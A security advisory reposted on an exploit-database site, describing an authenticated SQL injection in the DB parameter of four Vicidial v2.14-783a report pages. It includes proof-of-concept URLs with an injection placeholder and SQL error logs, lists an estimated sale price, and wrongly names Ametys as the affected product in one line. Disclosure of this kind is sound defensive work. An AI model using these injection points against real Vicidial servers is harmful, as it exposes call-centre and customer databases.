0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Vicidial 2.14-783a SQL Injection Vulnerability
=============== Vicidial v2.14-783a - (DB) SQL Injection Web Vulnerability Vulnerability Class: ==================== SQL Injection Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Vicidial is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well. The agent interface is an interactive set of web pages that work through a web browser to give real-time information and functionality with nothing more than an internet browser on the client computer. The management interface is also web-based and offers the ability to view many real-time and summary reports as well as many detailed campaign and agent options and settings. VICIDIAL can function as an ACD for inbound calls or for Closer calls coming from VICIDIAL outbound fronters and even allows for remote agents logging in from remote locations as well as remote agents that may only have a phone. There are currently over 24,000 installations of VICIDIAL in production in over 100 countries around the world, several with over 300 agent seats and many with multiple locations. (Copy of the Homepage:https://www.vicidial.org/vicidial.php ) (Download:https://www.vicidial.org/vicidial.php ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a sql-injection web vulnerability in the Vicidial v2.14-783a web-application. Affected Product(s): ==================== Vicidial Group Product: Ametys v4.4.1 - Content Management System (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-01-02: Researcher Notification & Coordination (Security Researcher) 2022-01-03: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2022-02-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A remote sql injection web vulnerability has been discovered in the official Vicidial v2.14-783a web-application. The vulnerability allows remote attackers to execute own sql commands to compromise the web-applicaation or connected dbms. The vulnerability is located in the `DB` parameter of the `AST_IVRstats.php`, `AST_LISTS_pass_report.php`, `AST_usergroup_login_report.php` and `admin_lists_custom.php` files. Remote attackers are able to execute sql commands by injection of malicious statements via GET method request by the DB parameter. The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1. Exploitation of the remote sql injection web vulnerabilities requires no user interaction but a agent or moderator web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable File(s): [+] AST_IVRstats.php [+] AST_LISTS_pass_report.php [+] AST_usergroup_login_report.php [+] admin_lists_custom.php Vulnerable Parameter(s): [+] DB Proof of Concept (PoC): ======================= The remote sql-injection web vulnerability can be exploited by privileged user with agent or manager access without user interaction. For security demontration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Exploitation https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=[SQL-INJECTION!]&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59 https://vicidial.localhost:8080/vicidial/AST_LISTS_pass_report.php?DB=[SQL-INJECTION!]&use_lists=&report_display_type=HTML&SUBMIT=SUBMIT https://vicidial.localhost:8080/vicidial/AST_usergroup_login_report.php?DB=[SQL-INJECTION!]&type=&user_group[]=001&report_display_type=HTML&SUBMIT=SUBMIT https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD_CONFIRMATION&list_id=108&field_id=133&field_label=idcliente&field_type=TEXT&field_duplicate=N&DB=[SQL-INJECTION!] https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD&list_id=108&field_id=134&field_label=nominteres&field_type=TEXT&field_duplicate=N&ConFiRm=YES&DB=[SQL-INJECTION!] SQL-Exception Logs --- SELECT use_non_latin,outbound_autodial_active,slave_db_server,reports_use_slave_db,enable_languages,language_method,report_ default_format FROM system_settings; |SELECT user_group from vicidial_users where user='1';| |SELECT allowed_campaigns,allowed_ reports,admin_viewable_groups,admin_viewable_call_times from vicidial_user_groups where user_group='ADMIN';| |SELECT count(*) from vicidial_inbound_groups where group_id='CALL_MENU';| |SELECT count(*) from vicidial_inbound_groups where group_id='XML_PULL';| select group_id,group_name from vicidial_inbound_groups order by group_id; select vsc_id,vsc_name from vicidial_status_categories; Inbound IVR Report - |SELECT selected_language from vicidial_users where user='1';| |SELECT count(*) from vicidial_users where user='1' and user_level > 7 and view_reports='1';| |SELECT count(*) from vicidial_users where user='1' and user_level > 6 and view_reports='1';| SELECT webserver_id FROM vicidial_webservers where webserver='www.vidicial.localhost:8080' and hostname='public' LIMIT 1; |INSERT INTO vicidial_report_log set event_date=NOW(), user='1', ip_address='13.73.13.7', report_name='Inbound IVR Report', browser='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0', referer='', notes='www.vidicial.localhost:8080: /vicidial/AST_IVRstats.php |, 00:00:00, 23:59:59, ALL, , HTML|', url='https://www.vidicial.localhost:8080/vicidial/AST_IVRstats.php?DB=%22%3E%3C%3E%20%3E%22%3C%20src=a%3E&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML', webserver='1'; | SELECT menu_background,frame_background,std_row1_background,std_row2_background,std_row3_background,std_row4_background,std_row5_background, alt_row1_background,alt_row2_background,alt_row3_background,web_logo,button_color FROM vicidial_screen_colors where colors_id='SpecialTheme'; - SELECT use_non_latin,outbound_autodial_active,slave_db_server,reports_use_slave_db,enable_languages,language_method,report_default_format FROM system_settings; |SELECT user_group from vicidial_users where user='1';| |SELECT allowed_campaigns,allowed_reports from vicidial_user_groups where user_group='ADMIN';| select campaign_id,campaign_name from vicidial_campaigns where campaign_id IN('','01','1000000','2525','27011987','291471','34536663','4444test','456456','4rentena','5001','5011','5151','5269','54321','554','5556','5584', '5678','5696','5888','6001','60606060','636363','6545','666555','132','6692','6789','69001','6969','70000','75465456','770077','777111','777777', '77788812','778888','7997','8000','80001','8001','8006','8010','8080','808080','83439860','83439866','8631','8787451','880088','8974257','8985', '90099','9010','9087','91224500','95868686','963852','98765','995813','9988','999','9998','ABITEST','ABI_IN','ABNOY','AC','Aribau','attack','AU2018', 'Ausie','AUS_LAND','AUTODIAL','Awesome','az_camp_','BESTEKA','binay','bmcamp','BOOMBOOM','CAMP','Camp69','campaa','CampPain','CB19IB','ceidg','CERTH' ,'chupa','comgivre','COS','cs54','CSPFC','CS_RO','CS_Test','CWMEM1','Cyburity','cyfuture','DABG','dardnoc_','DIRECTV','dishnet','dummy','Envy_it','FE' ,'ggg','hahahaID','HDCUSTM1','INBOUND','inbound5','inbound_','Incred1','ittcr','JGSCAMP','JOMS13','Jtesting','karn_edu','LAB001','lenovo','MANU','meh' ,'metst','mohsin11','moneytra','myCamp11','myfirst','nabil','new11111','NewDemo','Nighting','norm_sub','nowa','OBD_CH','Opros','OUT','Out01','outbroad ','papa23','PBN','PERUVENT','PERZIN','Pious_Jo','PLD','press1u','Press1UK','radhika','raja','rataninb','ratanout','real_198','recsurve','SAMPLE','sb',' SBD','SISVER','Swabb','TAX','test001','TEST1','test12','TESTCAM1','testout','testoutc','Test_ant','Test_Ind','TEST_KAY','Test_SD','Trend','tttttttt', 'tutabie','VBotCam','Manislc','588','ddd5','campA','campB1','campC','campD','Testcomp','Chidamb','slc13000','gr','solarSnk','RubixMP','2025','63111', 'INDIACAM','jkhkuj','12322','140292','678678','gino','8600061','0408','18241','suraj880','5 0001','001','Johnson','chat','chat_202','Recr0111','11223344','353621','8564','allstat','88854','101','pl','MANI_123','80000','Test608','OutRe1','UKOUT', 'TSTTSTTS','Mikano_o','3413','GABBY','10005','3241','nat2021','prueba','PabuIN','Youth','5002','HDFC','121','HDFCV','You','jjtest1','jomsCAMP','808182', 'gabbycam','gabbyca2','1522','69696969','10112103','smartbro','ast_test','12345abc','2259','62626','12000','1010','btibd') order by campaign_id; select status,human_answered,sale,dnc,customer_contact,not_interested,unworkable,scheduled_callback,completed,status_name from vicidial_statuses; select status,human_answered,sale,dnc,customer_contact,not_interested,unworkable,scheduled_callback,completed,status_name from vicidial_campaign_statuses where selectable IN('Y','N'); Lists Pass Report HELP - |SELECT selected_language from vicidial_users where user='1';| |SELECT count(*) from vicidial_users where user='1' and user_level > 7 and view_reports='1';| |SELECT count(*) from vicidial_users where user='1' and user_level > 6 and view_reports='1';| SELECT webserver_id FROM vicidial_webservers where webserver='www.vidicial.localhost:8080' and hostname='public' LIMIT 1; |INSERT INTO vicidial_report_log set event_date=NOW(), user='1', ip_address='13.73.13.7', report_name='Lists Pass Report', browser='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0', referer='', notes='www.vidicial.localhost:8080: /vicidial/AST_LISTS_pass_report.php |, , , , , HTML|', url='https://www.vidicial.localhost:8080/vicidial/AST_LISTS_pass_report.php?DB= -1%27&use_lists=&report_display_type=HTML&SUBMIT=SUBMIT', webserver='1';| SELECT menu_background,frame_background,std_row1_background,std_row2_background, std_row3_background,std_row4_background,std_row5_background,alt_row1_background, alt_row2_background,alt_row3_background,web_logo,button_color FROM vicidial_screen_colors where colors_id='SpecialTheme'; - |SELECT selected_language from vicidial_users where user='1';| |SELECT count(*) from vicidial_users where user='1' and user_level > 7 and view_reports='1';| |SELECT count(*) from vicidial_users where user='1' and user_level > 6 and view_reports='1';| SELECT webserver_id FROM vicidial_webservers where webserver= 'www.vidicial.localhost:8080' and hostname='public' LIMIT 1; |INSERT INTO vicidial_report_log set event_date=NOW(), user='1', ip_address='13.73.13.7', report_name=' User Group Login Report', browser='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0', referer='', notes='www.vidicial.localhost:8080: /vicidial/AST_usergroup_login_report.php |, , , , , HTML|', url='https://www.vidicial.localhost:8080/vicidial/AST_usergroup_login_report.php ?DB=-1%27&type=&user_group[]=001&report_display_type=HTML&SUBMIT=SUBMIT', webserver='1';| SELECT menu_background,frame_background,std_row1_background, std_row2_background,std_row3_background,std_row4_background,std_row5_background, alt_row1_background,alt_row2_background,alt_row3_background,web_logo,button_color FROM vicidial_screen_colors where colors_id='SpecialTheme'; - SELECT use_non_latin,outbound_autodial_active,slave_db_server,reports_use_slave_db,enable_languages,language_method,report_default_format FROM system_settings; |SELECT user_group from vicidial_users where user='1';| |SELECT allowed_campaigns,allowed_reports,admin_viewable_groups,admin_viewable_call_times from vicidial_user_groups where user_group='ADMIN';| select user_group from vicidial_user_groups order by user_group; |001||1|&user_group[]=001|1 - SELECT use_non_latin,webroot_writable,outbound_autodial_active,user_territories_active,custom_fields_enabled,enable_languages,language_method,active_modules FROM system_settings; |SELECT selected_language from vicidial_users where user='1';| |SELECT selected_language from vicidial_users where user='1';| ,DELETE_CUSTOM_FIELD_CONFIRMATION,94.242.243.162,1,,133,108,,idcliente,,,,,TEXT,,1,1,,,,,,,,,NSELECT count(*) from vicidial_lists_fields where list_id='108' and field_label='idcliente';SHOW TABLES LIKE "custom_108";|1|1 Security Risk: ============== The security risk of the remote sql-injection web vulnerability in the vicidial web-application is estimated as high. # 0day.today [2024-09-20] #